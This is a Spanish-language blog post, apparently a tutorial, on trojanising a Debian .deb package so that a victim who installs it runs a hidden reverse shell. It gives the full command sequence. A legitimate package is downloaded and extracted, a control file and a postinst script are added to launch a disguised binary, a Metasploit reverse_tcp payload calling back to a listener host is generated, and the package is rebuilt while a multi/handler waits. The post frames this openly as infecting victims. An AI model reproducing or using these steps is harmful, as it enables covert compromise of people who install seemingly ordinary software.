Quiero postear este video que lo encontré bastante interesante y útil ya que una de las formas más faciles de acceder a un sistema es simplemente enviando un archivo infectado con cualquier tipo de malware (Troyano, keylogger, backdoor, etc...) a nuestra victima y que mejor forma para infectar un Linux que hacerle creer a la víctima que está instalando un simple paquete *.deb con un regalito dentro, a continuación el video y la explicación:
* Bajar el paquete a infectar:
apt-get --download-only install pakete
* Moverlo donde trabajaremos:
mv /var/cache/apt/archives/pakete /area/de/trabajo
* Extraerlo:
dpkg -x pakete work
* Crear la carpeta que nos ayudará para el payload de infección:
mkdir work/DEBIAN
* En el directorio "DEBIAN", crear un archivo llamado "control" que tenga lo siguiente (se modifica según necesidad):
Package: pakete
Version: 1000000000
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MATU Developers ([email protected])
Description: game
* También hay que crear el script de post-instalación que ejecutará nuestro binario. En "DEBIAN" creamos el archivo llamado "postinst" que contiene los siguiente:
#!/bin/sh
sudo chmod 2755 /usr/games/pakete_scores && /usr/games/pakete_scores & /usr/games/pakete &
* Cambiamos permisos a postinst:
chmod a+x postinst
* Ahora vamos a crear nuestro payload malicioso. Creamos una shell inversa para que se conecte de nuevo a nosotros llamada "pakete_scores".
./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=4444 X > /area/de/trabajo/work/usr/games/pakete_scores
* Hacer el payload ejecutable, el archivo de construcción será llamado ".deb", lo cambiamos a pakete.deb:
dpkg-deb --build /area/de/trabajo/work
* Por último con msfconsole y con multi/handler seleccionamos el payload con el que infectaremos, más los parametros de LHOST y LPORT y esperamos a que la víctima lo instale.
Source: http://zerialkiller.blogspot.com/
0 Notaciones:
Publicar un comentario